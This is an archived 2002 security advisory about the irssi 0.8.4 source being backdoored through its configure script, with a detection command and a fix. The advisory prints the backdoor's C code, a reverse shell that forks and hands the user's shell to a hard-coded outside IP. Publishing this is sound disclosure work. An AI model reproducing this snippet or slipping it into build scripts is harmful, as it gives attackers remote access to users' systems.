Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix5372.htm

irssi backdoor



29th May 2002 [SBWID-5372]
COMMAND

	irssi backdoor

SYSTEMS AFFECTED

	0.8.4

PROBLEM

	Accodringly with irssi homepage [http://www.irssi.org],  main  web  site
	have been cracked  and  source  code  backdoored  for  last  two  months
	(binary not impacted).
	

	This code was found from configure - it forks a  new  process,  connects
	to some server and gives stdin/out/err to it (ie. giving  remote  access
	to your account):
	

	       int s;

	        struct sockaddr_in sa;

	        switch(fork()) { case 0: break; default: exit(0); }

	        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {

	                exit(1);

	        }

	 /* HP/UX 9 (%@#!) writes to sscanf strings */

	        memset(&sa, 0, sizeof(sa));

	        sa.sin_family = AF_INET;

	        sa.sin_port = htons(6667);

	        sa.sin_addr.s_addr = inet_addr(\"204.120.36.206\");

	        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {

	                exit(1);

	        }

	        dup2(s, 0); dup2(s, 1); dup2(s, 2);

	

	If you still have the irssi sources, you can  see  if  you\'re  affected
	with grep SOCK_STREAM configure -  if  it  returns  anything,  something
	might have been done to your system.
	

	

SOLUTION

	Upload source again - and check them with author GPG key.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH